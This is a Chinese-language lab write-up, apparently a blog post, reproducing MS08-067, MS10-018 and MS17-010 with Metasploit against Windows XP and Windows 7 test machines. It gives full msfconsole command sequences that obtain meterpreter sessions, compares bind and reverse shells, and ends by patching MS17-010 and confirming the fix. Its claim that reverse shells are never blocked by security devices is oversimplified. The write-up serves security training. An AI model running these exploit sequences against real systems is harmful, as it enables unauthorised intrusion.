13-MSF常见漏洞复现

1、MS08-067、MS10-018漏洞复现,对比bind和reverse攻击模式的区别

  • MS08-067

    环境:使用kali中的MSF工具攻击Windows XP

    1. 开启msfconsole,搜索MS08-067漏洞,进入漏洞利用模块

      msfconsole
      search ms08-067
      use  exploit/windows/smb/ms08_067_netapi 
      
    2. 查看配置项show options

    3. 设置相应的配置项

      set rhosts 10.0.0.171	#攻击的目标地址(Windows XP)
      set payload windows/meterpreter/bind_tcp	#设置攻击模式
      show targets	#查看可攻击的目标类型
      set target 34	#设置攻击目标类型(Windows XP SP3 Chinese - Simplified (NX))
      
    4. 检查配置信息无误

      image-20241212163849726

    5. 执行exploit攻击(前提:保证目标防火墙是关闭的状态)

      成功拿下:

      image-20241212165336981

  • MS10-018

    • 漏洞利用复现

      msfconsole
      search ms10-018
      use exploit/windows/browser/ms10_018_ie_behaviors
      set srvhost		#设置反弹监听地址(kali)
      set uripath test01		#设置uri路径名称
      options 	#检查配置信息
      run 	#发起攻击
      
    • msf生成访问地址,让靶机访问url

      image-20241212172510051

      image-20241212172147174

    • 生成监听会话,成功拿下meterpreter

      sessions -l 	#列出全部会话
      sessions -i 1 	#选择会话1利用
      

      image-20241212172659933

  • bind和reverse攻击模式的区别:

    bind攻击模式是kali主动攻击靶机(由外到内),具有攻击行为容易被安全设备拦截,而reverse模式是靶机主动连接Kali(由内到外)反弹shell,不具有攻击行为不会被安全设备所拦截。

2、MS17-010漏洞复现

(1)针对靶机系统使用0~3漏洞利用模块进行攻击

  • 利用win7漏洞满足环境:

    • 防火墙必须允许SMB流量出入:关闭防火墙

    • 目标必须使用SMBv1协议 (默认)

    • 目标必须缺少MS17-010补丁 (默认)

    • 目标必须允许匿名IPC$和管道名:cmd - gpedit.msc(打开组策略)> Windows设置 > 安全设置 > 本地策略 > 安全选项 > 网络访问:限制对命名管道和共享的匿名访问 - 禁用

  • 0 ~ MS17-010(windows/smb/ms17_010_eternalblue)

    search ms17-010
    use 0
    options
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    成功拿下meterpreter

    image-20241212185028891

  • 1 ~ MS17-010(exploit/windows/smb/ms17_010_psexec)

    search ms17-010
    use 1
    options
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    成功拿下meterpreter

    image-20241212185400616

  • 2 ~ MS17-010(auxiliary/admin/smb/ms17_010_command)

    search ms17-010
    use 2
    options
    set command whoami
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    image-20241212185736392

  • 3 ~ MS17-010(auxiliary/scanner/smb/smb_ms17_010)

    search ms17-010
    use 3
    options
    set rhosts 10.0.0.154 	#Win7的地址
    run
    

    image-20241212185927553

(2)分别注明0~3漏洞利用模块的攻击效果和利用条件,完成漏洞修复

漏洞 攻击效果 利用条件
0~windows/smb/ms17_010_eternalblue 直接拿下meterpreter 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁
1~exploit/windows/smb/ms17_010_psexec 直接拿下meterpreter 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁、允许匿名IPC$和管道名
2~auxiliary/admin/smb/ms17_010_command 返回命令执行结果 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁、允许匿名IPC$和管道名
3~auxiliary/scanner/smb/smb_ms17_010 仅作扫描 目标:防火墙关闭、使用SMBv1协议、无MS17-010补丁

漏洞修复:Win7中下载ms17-010补丁

再次利用ms17-010漏洞时,回显结果显示已不存在漏洞,证明补丁打入成功

image-20241212193747287

posted @ 2024-12-19 13:39  荔枝在敲诈  阅读(188)  评论(0)    收藏  举报